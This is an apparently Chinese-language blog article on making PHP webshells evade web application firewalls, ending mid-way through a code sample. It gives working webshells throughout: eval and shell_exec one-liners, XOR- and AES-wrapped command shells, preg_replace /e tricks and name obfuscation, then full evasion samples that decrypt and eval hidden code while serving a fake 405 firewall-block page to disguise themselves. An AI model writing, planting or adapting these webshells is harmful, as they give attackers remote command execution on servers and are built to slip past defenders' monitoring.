0x00前言
之前hw遇到多挺多次waf,想最初还是找大哥要来多个webshell的免杀样本去绕,随着次数增多,开始也有意无意去研究免杀的手段,借这篇文章去做一个简要的webshell免杀分析,就当做知识面的巩固。
0x01原理
免杀绕过waf的原理实际上也是借助编码、加密的手段去绕过waf的规则,只要手段足够多,就能绕过大部分waf。相反,waf的规则足够多,也能抵挡大部分的webshell。
以一个php一句话木马为例
1
2
3
| <?php
eval($_POST['cmd']);
?>
|
代码就是通过eval函数去执行传过来的cmd参数,很显然,这个函数已经是经过waf的严格审核,那如何去对这个函数去做手段?
1、函数替代法
那时候的waf规则还不够完善,而且php的执行命令还有若干个,比如shell_exec、system、assert、passthru、exec
system
执行命令并返回结果
shell_exec
执行命令不返回结果
assert
一般称为断言,但是可以执行命令,不过要注意的是在php7.1之后assert没有执行命令功能
这些函数可以替换eval,不过现在这个时代我相信这些函数大大小小都是被waf监控住的
常用的函数剩下一个system,因为这个在很多模块都可能有所以不会那么严格
2、拼接法
这里是利用php的一个致命缺陷,就是可以通过 . 连接字符串,比如echo $a.$b
这样会拼接成ab。那可以使用该方法对敏感函数拼接起来
‘s’.’y’.’s’.’t’.’e’.’m’
其他语言则可以用+号拼接
通过拼接,去完善 $_POST 或 $_GET 传参
1
2
3
| $a = $_POST['cmd'];
$b = eval;
$b($a);
|
3、异或法
异或也就是使用xor加密函数,对payload进行一个异或的操作实现加密
1
2
3
| $key = "sadwa21s21lm1";
$encoded = $input ^ $key;
eval($encoded ^ $key);
|
4、AES加密
这种方法对现代waf的免杀效果还是比较明显,因为存在pcb和cbc的加密模式和随机数密钥,可以从静态层面上绕过大部分waf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| <?php
$key = 'secretkey';
$iv = 'iviviv';
function encrypt($data, $key, $iv) {
return openssl_encrypt($data, 'AES-256-CBC', $key, 0, $iv);
}
function decrypt($data, $key, $iv) {
return openssl_decrypt($data, 'AES-256-CBC', $key, 0, $iv);
}
if (isset($_POST['cmd'])) {
$encryptedCmd = $_POST['cmd'];
$decryptedCmd = decrypt($encryptedCmd, $key, $iv);
if ($decryptedCmd) {
$output = shell_exec($decryptedCmd);
echo encrypt($output, $key, $iv);
} else {
echo 'Decryption failed';
}
} else {
echo 'No command received';
}
?>
|
5、字符串替换
在php中有个replace函数,可以输入一个错误的字符串,并将其替换为命令执行函数
1
2
| $a = test($_POST['cmd']);
str_replace("e" . "val", "test", $a);
|
其中还有一个函数比较特别
preg_replace,其中/e模式是用来执行代码的
1
2
| echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]);
|
这里说明下preg_replace的几个重要点
1
2
3
4
5
6
| 1、/g 表示该表达式将用来在输入字符串中查找所有可能的匹配,返回的结果可以是多个。如果不加/g最多只会匹配一个
2、/i 表示匹配的时候不区分大小写,这个跟其它语言的正则用法相同
3、/m 表示多行匹配。什么是多行匹配呢?就是匹配换行符两端的潜在匹配。影响正则中的^$符号
4、/s 与/m相对,单行模式匹配。
5、/e 可执行模式,此为PHP专有参数,例如preg_replace函数。
6、/x 忽略空白模式。
|
1
2
3
| \\1是反向引用
对一个正则表达式模式或部分模式 两边添加圆括号 将导致相关 匹配存储到一个临时缓冲区 中,所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始,最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 '\n' 访问,其中 n 为一个标识特定缓冲区的一位或两位十进制数
现在这里是\1,就匹配第一个
|
拓展
在waf禁用了preg_replace的情况下可以用其他两个函数
mb_ereg_replace、mb_eregi_replace,使用的方法相同,都是/e执行
6、编码绕过
base64编码、rot13编码、base32编码,unicode编码、url编码都可以去尝试
7、代码混淆
还是以php为例
这里的混淆已经有好多年的历史了,不妨再提一下
1
| $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=7088;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';
|
这种代码是否看的头大,陌生又熟悉,实际上是利用php动态变量的属性+base64编码+自定义变量
1
2
3
4
5
| $O00OO0000 = 'assert';
$O0O0OOO0 = 'system';
$O0O00O0O = 'shell_exec';
$O00OO0000("echo 'Hello'");
$O0O0OOO0("ls");
|
也就是这种
1
2
3
4
5
| <?php
$O0O0O = "e"."v"."al";
$O0O0O(base64_decode('c3lzdGVtKCdscycpOw=='));
?>
|
0x02案例分析
找几个免杀的样本来简要分析下里面的技术
以XG拟态为例
1、aes+base64
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| <?php
class cFile {
private function selectFile($filename){
$sign = 'fff6cdb9613532a1';
$fileurl = 'F4Ig+uOe6m94xRsp1jE3v3+NTr5ynQj/qVoBWQuKci0=';
$file = openssl_decrypt(cFile::de($fileurl), "AES-128-ECB", $sign,OPENSSL_PKCS1_PADDING);
$file_error = $$filename;
@eval($file_error);
return "filename";
}
public function getPriv() {
return $this->selectFile(...);
}
public static function de($file){
return base64_decode($file);
}
}
$cfile = new cFile;
$error = $cfile->getPriv();
$error('file');
$VMf0hX = "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9InpoLWNuIj4KCjxoZWFkPgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9ImRhdGEtc3BtIiBjb250ZW50PSJhM2MwZSIgLz4KICAgIDx0aXRsZT4KICAgICAgICA0MDUKICAgIDwvdGl0bGU+CiAgICA8c2NyaXB0IHNyYz0iLy9nLmFsaWNkbi5jb20vY29kZS9saWIvcXJjb2RlanMvMS4wLjAvcXJjb2RlLm1pbi5qcyI+PC9zY3JpcHQ+CiAgICA8c3R5bGU+CiAgICAgICAgaHRtbCwKICAgICAgICBib2R5LAogICAgICAgIGRpdiwKICAgICAgICBhLAogICAgICAgIGgyLAogICAgICAgIHAgewogICAgICAgICAgICBtYXJnaW46IDA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiDlvq7ova/pm4Xpu5E7CiAgICAgICAgfQoKICAgICAgICBhIHsKICAgICAgICAgICAgdGV4dC1kZWNvcmF0aW9uOiBub25lOwogICAgICAgICAgICBjb2xvcjogIzNiNmVhMzsKICAgICAgICB9CgogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICB3aWR0aDogMTAwMHB4OwogICAgICAgICAgICBtYXJnaW46IGF1dG87CiAgICAgICAgICAgIGNvbG9yOiAjNjk2OTY5OwogICAgICAgIH0KCiAgICAgICAgLmhlYWRlciB7CiAgICAgICAgICAgIHBhZGRpbmc6IDUwcHggMDsKICAgICAgICB9CgogICAgICAgIC5oZWFkZXIgLm1lc3NhZ2UgewogICAgICAgICAgICBoZWlnaHQ6IDM2cHg7CiAgICAgICAgICAgIHBhZGRpbmctbGVmdDogMTIwcHg7CiAgICAgICAgICAgIGJhY2tncm91bmQ6IHVybChodHRwczovL2Vycm9ycy5hbGl5dW4uY29tL2ltYWdlcy9UQjFUcGFtSHBYWFhYYUpYWFhYZUI3bllWWFgtMTA0LTE2Mi5wbmcpIG5vLXJlcGVhdCAwIC0xMjhweDsKICAgICAgICAgICAgbGluZS1oZWlnaHQ6IDM2cHg7CiAgICAgICAgfQoKICAgICAgICAubWFpbiB7CiAgICAgICAgICAgIHBhZGRpbmc6IDUwcHggMDsKICAgICAgICAgICAgYmFja2dyb3VuZDoKICAgICAgICAgICAgICAgICNmNGY1Zjc7CiAgICAgICAgfQoKICAgICAgICAubWFpbiBpbWcgewogICAgICAgICAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICAgICAgICAgIGxlZnQ6IDEyMHB4OwogICAgICAgIH0KCiAgICAgICAgLmZvb3RlciB7CiAgICAgICAgICAgIG1hcmdpbi10b3A6CiAgICAgICAgICAgICAgICAzMHB4OwogICAgICAgICAgICB0ZXh0LWFsaWduOiByaWdodDsKICAgICAgICB9CgogICAgICAgIC5mb290ZXIgYSB7CiAgICAgICAgICAgIHBhZGRpbmc6IDhweCAzMHB4OwogICAgICAgICAgICBib3JkZXItcmFkaXVzOgogICAgICAgICAgICAgICAgMTBweDsKICAgICAgICAgICAgYm9yZGVyOiAxcHggc29saWQgIzRiYWJlYzsKICAgICAgICB9CgogICAgICAgIC5mb290ZXIgYTpob3ZlciB7CiAgICAgICAgICAgIG9wYWNpdHk6IC44OwogICAgICAgIH0KCiAgICAgICAgLmFsZXJ0LXNoYWRvdyB7CiAgICAgICAgICAgIGRpc3BsYXk6IG5vbmU7CiAgICAgICAgICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsKICAgICAgICAgICAgdG9wOiAwOwogICAgICAgICAgICBsZWZ0OiAwOwogICAgICAgICAgICB3aWR0aDogMTAwJTsKICAgICAgICAgICAgaGVpZ2h0OgogICAgICAgICAgICAgICAgMTAwJTsKICAgICAgICAgICAgYmFja2dyb3VuZDogIzk5OTsKICAgICAgICAgICAgb3BhY2l0eTogLjU7CiAgICAgICAgfQoKICAgICAgICAuYWxlcnQgewogICAgICAgICAgICBkaXNwbGF5OiBub25lOwogICAgICAgICAgICBwb3NpdGlvbjoKICAgICAgICAgICAgICAgIGFic29sdXRlOwogICAgICAgICAgICB0b3A6IDIwMHB4OwogICAgICAgICAgICBsZWZ0OiA1MCU7CiAgICAgICAgICAgIHdpZHRoOiA2MDBweDsKICAgICAgICAgICAgbWFyZ2luLWxlZnQ6IC0zMDBweDsKICAgICAgICAgICAgcGFkZGluZy1ib3R0b206CiAgICAgICAgICAgICAgICAyNXB4OwogICAgICAgICAgICBib3JkZXI6IDFweCBzb2xpZCAjZGRkOwogICAgICAgICAgICBib3gtc2hhZG93OiAwIDJweCAycHggMXB4IHJnYmEoMCwgMCwgMCwgLjEpOwogICAgICAgICAgICBiYWNrZ3JvdW5kOiAjZmZmOwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGNvbG9yOiAjNjk2OTY5OwogICAgICAgIH0KCiAgICAgICAgLmFsZXJ0IGgyIHsKICAgICAgICAgICAgbWFyZ2luOgogICAgICAgICAgICAgICAgMCAycHg7CiAgICAgICAgICAgIHBhZGRpbmc6IDEwcHggMTVweCA1cHggMTVweDsKICAgICAgICAgICAgZm9udC1zaXplOiAxNHB4OwogICAgICAgICAgICBmb250LXdlaWdodDogbm9ybWFsOwogICAgICAgICAgICBib3JkZXItYm90dG9tOiAxcHggc29saWQgI2RkZDsKICAgICAgICB9CgogICAgICAgIC5hbGVydCBhIHsKICAgICAgICAgICAgZGlzcGxheTogYmxvY2s7CiAgICAgICAgICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsKICAgICAgICAgICAgcmlnaHQ6IDEwcHg7CiAgICAgICAgICAgIHRvcDogOHB4OwogICAgICAgICAgICB3aWR0aDogMzBweDsKICAgICAgICAgICAgaGVpZ2h0OiAyMHB4OwogICAgICAgICAgICB0ZXh0LWFsaWduOiBjZW50ZXI7CiAgICAgICAgfQoKICAgICAgICAuYWxlcnQgcCB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHggMTVweDsKICAgICAgICB9CgogICAgICAgICNmZWVkYmFjay1jb250YWluZXIgewogICAgICAgICAgICB3aWR0aDogMTEwcHg7CiAgICAgICAgICAgIG1hcmdpbjogYXV0bzsKICAgICAgICAgICAgbWFyZ2luLXRvcDogMTIwcHg7CiAgICAgICAgICAgIHRleHQtYWxpZ246IGNlbnRlcjsKICAgICAgICB9CgogICAgICAgICNxcmNvZGUgewogICAgICAgICAgICBtYXJnaW46IDAgMTVweCA1cHggMTVweDsKICAgICAgICB9CgogICAgICAgICNmZWVkYmFjayBhIHsKICAgICAgICAgICAgY29sb3I6ICM5OTk7CiAgICAgICAgICAgIGZvbnQtc2l6ZTogMTJweDsKICAgICAgICAgICAgbWFyZ2luLXRvcDogNXB4OwogICAgICAgIH0KICAgIDwvc3R5bGU+CjwvaGVhZD4KCjxib2R5IGRhdGEtc3BtPSI3NjYzMzU0Ij4KICAgIDxzY3JpcHQ+CiAgICAgICAgd2l0aCAoZG9jdW1lbnQpIHdpdGggKGJvZHkpIHdpdGggKGluc2VydEJlZm9yZShjcmVhdGVFbGVtZW50KCJzY3JpcHQiKSwgZmlyc3RDaGlsZCkpIHNldEF0dHJpYnV0ZSgiZXhwYXJhbXMiLCAiY2F0ZWdvcnk9JnVzZXJpZD02ODUzMDgyOTUmYXBsdXMmdWRwaWQ9VldlVU9jZVFKZEtqJiZ5dW5pZD0mZTkzYjRlM2U3NWUwNSZ0cmlkPTY1MjViNzk2MTU4MzkyMDYwOTQwMDM5MzhlJmFzaWQ9QVlmNTJDamh0V2hlK2FmK0hRQUFBQUNXQS9TSW5PM1FMdz09IiwgaWQgPSAidGItYmVhY29uLWFwbHVzIiwgc3JjID0gKGxvY2F0aW9uID4gImh0dHBzIiA/ICIvL2ciIDogIi8vZyIpICsgIi5hbGljZG4uY29tL2FsaWxvZy9tbG9nL2FwbHVzX3YyLmpzIikKICAgIDwvc2NyaXB0PgogICAgPHNjcmlwdD4KICAgICAgICAvLwogICAgICAgIHZhciBpMThuT2JqZWN0ID0gewogICAgICAgICAgICAiemgtY24iOiB7CiAgICAgICAgICAgICAgICAibWVzc2FnZSI6ICLlvojmirHmrYnvvIznlLHkuo7mgqjorr/pl67nmoRVUkzmnInlj6/og73lr7nnvZHnq5npgKDmiJDlronlhajlqIHog4HvvIzmgqjnmoTorr/pl67ooqvpmLvmlq3jgIIiLAogICAgICAgICAgICAgICAgImJnSW1nIjogImh0dHBzOi8vZXJyb3JzLmFsaXl1bi5jb20vaW1hZ2VzL1RCMTVRR2FIcFhYWFhYT2FYWFhYaWEzOVhYWC02NjAtMTE3LnBuZyIsCiAgICAgICAgICAgICAgICAicmVwb3J0IjogIuivr+aKpeWPjemmiCIsCiAgICAgICAgICAgIH0sCiAgICAgICAgICAgICJlbi11cyI6IHsKICAgICAgICAgICAgICAgICJtZXNzYWdlIjogIlNvcnJ5LCB3ZSBoYXZlIGRldGVjdGVkIG1hbGljaW91cyB0cmFmZmljIGZyb20geW91ciBuZXR3b3JrLCBwbGVhc2UgdHJ5IGFnYWluIGxhdGVyLiIsCiAgICAgICAgICAgICAgICAiYmdJbWciOiAiaHR0cHM6Ly9pbWcuYWxpY2RuLmNvbS90ZnMvVEIxQURBT0lGenFLMVJqU1pTZ1hYY3BBVlhhLTEzMjAtMjM0LmpwZyIsCiAgICAgICAgICAgICAgICAicmVwb3J0IjogIlJlcG9ydCIsCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgdmFyIGkxOG4gPSBpMThuT2JqZWN0WyJlbi11cyJdOwogICAgICAgIGlmIChuYXZpZ2F0b3IubGFuZ3VhZ2UuaW5kZXhPZigiemgiKSA+PSAwKSB7CiAgICAgICAgICAgIGkxOG4gPSBpMThuT2JqZWN0WyJ6aC1jbiJdOwogICAgICAgIH0KCiAgICA8L3NjcmlwdD4KCiAgICA8ZGl2IGRhdGEtc3BtPSIxOTk4NDEwNTM4Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJoZWFkZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ibWVzc2FnZSI+CiAgICAgICAgICAgICAgICAgICAgPHNjcmlwdD5kb2N1bWVudC53cml0ZShpMThuLm1lc3NhZ2UpPC9zY3JpcHQ+CiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0ibWFpbiI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICA8c2NyaXB0PmRvY3VtZW50LndyaXRlKCc8aW1nIHdpZHRoPSI2NjAiIGhlaWdodD0iMTE3IiBzcmM9IicgKyBpMThuLmJnSW1nICsgJyIvPicpPC9zY3JpcHQ+CgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJmb290ZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICAgICAgPHNwYW4gc3R5bGU9J2Rpc3BsYXk6bm9uZSc+CiAgICAgICAgICAgICAgICAgICAgPHNjcmlwdD4KICAgICAgICAgICAgICAgICAgICAgICAgZnVuY3Rpb24gZ2V0UXVlcnlTdHJpbmcodXJsLCBuYW1lKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YXIgcmVnID0gbmV3IFJlZ0V4cCgnKF58JiknICsgbmFtZSArICc9KFteJl0qKSgmfCQpJyk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YXIgciA9IHVybC5zdWJzdHIoMSkubWF0Y2gocmVnKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChyICE9PSBudWxsKSByZXR1cm4gdW5lc2NhcGUoclsyXSk7IHJldHVybiBudWxsOwogICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgIHZhciBfX3V1aWRfX18gPSBnZXRRdWVyeVN0cmluZyhsb2NhdGlvbi5ocmVmLCAidXVpZCIpCiAgICAgICAgICAgICAgICAgICAgPC9zY3JpcHQ+CiAgICAgICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgICAgICAgICA8YSB0YXJnZXQ9Il9ibGFuayIgaWQ9InJlcG9ydCIgaHJlZj0iamF2YXNjcmlwdDo7IiBkYXRhLXNwbS1jbGljaz0iZ29zdHI9L3dhZi4xMjMuMTIzO2xvY2FpZD1kMDAxOyI+CiAgICAgICAgICAgICAgICAgICAgPHNjcmlwdD5kb2N1bWVudC53cml0ZShpMThuLnJlcG9ydCk8L3NjcmlwdD4KICAgICAgICAgICAgICAgIDwvYT4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KICAgIDxkaXYgaWQ9ImFsZXJ0U2hhZG93IiBjbGFzcz0iYWxlcnQtc2hhZG93Ij4KICAgIDwvZGl2PgogICAgPGRpdiBpZD0iYWxlcnRDb250YWluZXIiIGNsYXNzPSJhbGVydCI+CiAgICAgICAgPGgyPgogICAgICAgICAgICDmj5DnpLrvvJoKICAgICAgICAgICAgPGEgaHJlZj0iamF2YXNjcmlwdDo7IiB0aXRsZT0i5YWz6ZetIiBpZD0iY2xvc2VBbGVydCI+CiAgICAgICAgICAgICAgICBYCiAgICAgICAgICAgIDwvYT4KICAgICAgICA8L2gyPgogICAgICAgIDxwPgogICAgICAgICAgICDmhJ/osKLmgqjnmoTlj43ppojvvIzlupTnlKjpmLLngavlopnkvJrlsL3lv6vov5vooYzliIbmnpDlkoznoa7orqTjgIIKICAgICAgICA8L3A+CiAgICA8L2Rpdj4KICAgIDxkaXYgaWQ9ImZlZWRiYWNrLWNvbnRhaW5lciI+CiAgICAgICAgPGRpdiBpZD0icXJjb2RlIj48L2Rpdj4KICAgICAgICA8ZGl2IGlkPSJmZWVkYmFjayI+PC9kaXY+CiAgICA8L2Rpdj4KICAgIDxzY3JpcHQ+CiAgICAgICAgZnVuY3Rpb24gc2hvdygpIHsKICAgICAgICAgICAgdmFyIGcgPSBmdW5jdGlvbiAoZWxlKSB7CiAgICAgICAgICAgICAgICByZXR1cm4gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoZWxlKTsKICAgICAgICAgICAgfTsKICAgICAgICAgICAgdmFyIHJlcG9ydEhhbmRsZSA9IGcoJ3JlcG9ydCcpOwogICAgICAgICAgICB2YXIgYWxlcnRTaGFkb3cgPSBnKCdhbGVydFNoYWRvdycpOwogICAgICAgICAgICB2YXIgYWxlcnRDb250YWluZXIgPSBnKCdhbGVydENvbnRhaW5lcicpOwogICAgICAgICAgICB2YXIgY2xvc2VBbGVydCA9IGcoJ2Nsb3NlQWxlcnQnKTsKICAgICAgICAgICAgdmFyIG93biA9IHt9OwogICAgICAgICAgICBvd24ucmVwb3J0ID0gZnVuY3Rpb24gKCkgeyAKICAgICAgICAgICAgICAgIG93bi5hbGVydCgpOwogICAgICAgICAgICB9OyBvd24uYWxlcnQgPSBmdW5jdGlvbiAoKSB7IGFsZXJ0U2hhZG93LnN0eWxlLmRpc3BsYXkgPSAnYmxvY2snOyBhbGVydENvbnRhaW5lci5zdHlsZS5kaXNwbGF5ID0gJ2Jsb2NrJzsgfTsgb3duLmNsb3NlID0gZnVuY3Rpb24gKCkgeyBhbGVydFNoYWRvdy5zdHlsZS5kaXNwbGF5ID0gJ25vbmUnOyBhbGVydENvbnRhaW5lci5zdHlsZS5kaXNwbGF5ID0gJ25vbmUnOyB9OwogICAgICAgIH07CgogICAgICAgIHZhciB1dWlkID0gbG9jYXRpb24uaHJlZi5tYXRjaCgvdXVpZD0oW14mXSspLyk7CiAgICAgICAgdXVpZCA9IHV1aWQgJiYgZW5jb2RlVVJJQ29tcG9uZW50KHV1aWRbMV0pOwogICAgICAgIHZhciB1cmxRckNvZGUgPSBsb2NhdGlvbi5ocmVmLm1hdGNoKC9xcmNvZGU9KFteJl0rKS8pOwogICAgICAgIHVybFFyQ29kZSA9IHVybFFyQ29kZSAmJiBkZWNvZGVVUklDb21wb25lbnQodXJsUXJDb2RlWzFdKTsKICAgICAgICBpZiAodXVpZCB8fCB1cmxRckNvZGUpIHsKICAgICAgICAgICAgdmFyIHFyY29kZSA9IG5ldyBRUkNvZGUoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInFyY29kZSIpLCB7CiAgICAgICAgICAgICAgICB0ZXh0OiB1cmxRckNvZGUgfHwgdXVpZCwKICAgICAgICAgICAgICAgIHdpZHRoOiA4MCwKICAgICAgICAgICAgICAgIGhlaWdodDogODAsCiAgICAgICAgICAgICAgICBjb2xvckRhcms6ICIjOTk5IiwKICAgICAgICAgICAgfSk7CiAgICAgICAgICAgIHZhciBmZWVkYmFja0xpbmsgPSBnZXRGZWVkYmFja0xpbmsoKTsKICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImZlZWRiYWNrIikuaW5uZXJIVE1MID0gZmVlZGJhY2tMaW5rOwogICAgICAgIH0KICAgICAgICBmdW5jdGlvbiBnZXRGZWVkYmFja0xpbmsoKSB7CiAgICAgICAgICAgIHZhciB1cmxPcmlnaW47CiAgICAgICAgICAgIHVybE9yaWdpbiA9IGxvY2F0aW9uLmhyZWYubWF0Y2goL29yaWdpbj0oW14mXSspLyk7CiAgICAgICAgICAgIHVybE9yaWdpbiA9IHVybE9yaWdpbiAmJiBkZWNvZGVVUklDb21wb25lbnQodXJsT3JpZ2luWzFdKS5zcGxpdCgiPyIpWzBdOwogICAgICAgICAgICBpZiAodXJsT3JpZ2luKSB7CiAgICAgICAgICAgICAgICB0cnkgewogICAgICAgICAgICAgICAgICAgIHVybE9yaWdpbiA9IG5ldyBVUkwodXJsT3JpZ2luKTsKICAgICAgICAgICAgICAgICAgICBpZiAodXJsT3JpZ2luLnByb3RvY29sICE9PSAiaHR0cHM6IiAmJiB1cmxPcmlnaW4ucHJvdG9jb2wgIT09ICJodHRwOiIpIHsKICAgICAgICAgICAgICAgICAgICAgICAgdXJsT3JpZ2luID0gbnVsbDsKICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICB1cmxPcmlnaW4gPSB1cmxPcmlnaW4uaHJlZjsKICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICB9IGNhdGNoIChlKSB7CiAgICAgICAgICAgICAgICAgICAgaWYgKHR5cGVvZiB1cmxPcmlnaW4gIT09ICJzdHJpbmciIHx8IHVybE9yaWdpbi5pbmRleE9mKCJodHRwIikgIT09IDApIHsKICAgICAgICAgICAgICAgICAgICAgICAgdXJsT3JpZ2luID0gbnVsbDsKICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICB1cmxPcmlnaW4gPSBmaWx0ZXJIdG1sKHVybE9yaWdpbik7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgICAgIHZhciBfbGFuZ3VhZ2UgPSBuYXZpZ2F0b3IuYnJvd3Nlckxhbmd1YWdlIHx8IG5hdmlnYXRvci5sYW5ndWFnZTsKICAgICAgICAgICAgdmFyIHRleHQgPSBbInpoLUNOIiwgInpoLWNuIl0uaW5jbHVkZXMoX2xhbmd1YWdlKSA/ICLngrnmiJHlj43ppoggPiIgOiAiQ2xpY2sgdG8gZmVlZGJhY2sgPiI7CiAgICAgICAgICAgIHJldHVybiAnPGEgaHJlZj0iJyArIHVybE9yaWdpbiArICcvX19fX190bWRfX19fXy9wYWdlL2ZlZWRiYWNrP3JhbmQ9UzNXeEdIQWdBdDc1NkVwem53Zk56SnEyQUZBMnFCTmxhM2o2RUlOVVM4V2U5ZGF6TV9pS0VscDhEd1ZTSFpVZXZwQzQxQng3UnppdlhJajlSblpnZGcmdXVpZD0nICsgZW5jb2RlVVJJQ29tcG9uZW50KHV1aWQpICsgJyZ0eXBlPTYiIHRhcmdldD0iX2JsYW5rIj4nICsgdGV4dCArICc8L2E+JzsKICAgICAgICB9OwogICAgICAgIGZ1bmN0aW9uIGZpbHRlckh0bWwoc3RyKSB7CiAgICAgICAgICAgIHN0ciA9IHN0ci5yZXBsYWNlKC8mL2csICIiKTsKICAgICAgICAgICAgc3RyID0gc3RyLnJlcGxhY2UoLz4vZywgIiIpOwogICAgICAgICAgICBzdHIgPSBzdHIucmVwbGFjZSgvPC9nLCAiIik7CiAgICAgICAgICAgIHN0ciA9IHN0ci5yZXBsYWNlKC8iL2csICIiKTsKICAgICAgICAgICAgc3RyID0gc3RyLnJlcGxhY2UoLycvZywgIiIpOwogICAgICAgICAgICBzdHIgPSBzdHIucmVwbGFjZSgvYC9nLCAiIik7CiAgICAgICAgICAgIHN0ciA9IHN0ci5yZXBsYWNlKC9qYXZhc2NyaXB0L2csICIiKTsKICAgICAgICAgICAgc3RyID0gc3RyLnJlcGxhY2UoL2lmcmFtZS9nLCAiIik7CiAgICAgICAgICAgIHJldHVybiBzdHI7CiAgICAgICAgfQoKICAgIDwvc2NyaXB0PgogICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIGNoYXJzZXQ9InV0Zi04IiBzcmM9Imh0dHBzOi8vZXJyb3JzLmFsaXl1bi5jb20vZXJyb3IuanM/cz0xMCI+CiAgICA8L3NjcmlwdD4KPC9ib2R5PgoKPC9odG1sPg==";
if( count($_REQUEST) || file_get_contents("php://input") ){
}else{
header('Content-Type:text/html;charset=utf-8'); http_response_code(405);
echo base64_decode($VMf0hX);
}
|
这里是对文件内容进行aes加密之后,用代码进行解密
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| private function selectFile($filename){
$sign = 'fff6cdb9613532a1';
$fileurl = 'F4Ig+uOe6m94xRsp1jE3v3+NTr5ynQj/qVoBWQuKci0=';
$file = openssl_decrypt(cFile::de($fileurl), "AES-128-ECB", $sign,OPENSSL_PKCS1_PADDING);
$file_error = $$filename;
@eval($file_error);
return "filename";
}
public function getPriv() {
return $this->selectFile(...);
}
public static function de($file){
return base64_decode($file);
}
}
|
2、动态拼接+替换+base64
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| <?php
$password='WlhaZYLWcbSbaGJDZ2ZYLWcbSbtYMUJQVTFSYkoyTnRaQ2RkS1RzPQ==';
$username = get_meta_tags(__FILE__)[$_GET['token']];
header("ddddddd:".$username);
$arr = apache_response_headers();
$template_source='';
foreach ($arr as $k => $v) {
if ($k[0] == 'd' && $k[5] == 'd') {
$template_source = str_replace($v,'',$password);
}}
$template_source = base64_decode($template_source);
$template_source = base64_decode($template_source);
$key = 'template_source';
$aes_decode[1]=$$key;
@eval($aes_decode[1]);
$jWLTwO = "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9InpoLWNuIj4KCjxoZWFkPgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9ImRhdGEtc3BtIiBjb250ZW50PSJhM2MwZSIgLz4KICAgIDx0aXRsZT4KICAgICAgICA0MDUKICAgIDwvdGl0bGU+CiAgICA8c2NyaXB0IHNyYz0iLy9nLmFsaWNkbi5jb20vY29kZS9saWIvcXJjb2RlanMvMS4wLjAvcXJjb2RlLm1pbi5qcyI+PC9zY3JpcHQ+CiAgICA8c3R5bGU+CiAgICAgICAgaHRtbCwKICAgICAgICBib2R5LAogICAgICAgIGRpdiwKICAgICAgICBhLAogICAgICAgIGgyLAogICAgICAgIHAgewogICAgICAgICAgICBtYXJnaW46IDA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAgIGZvb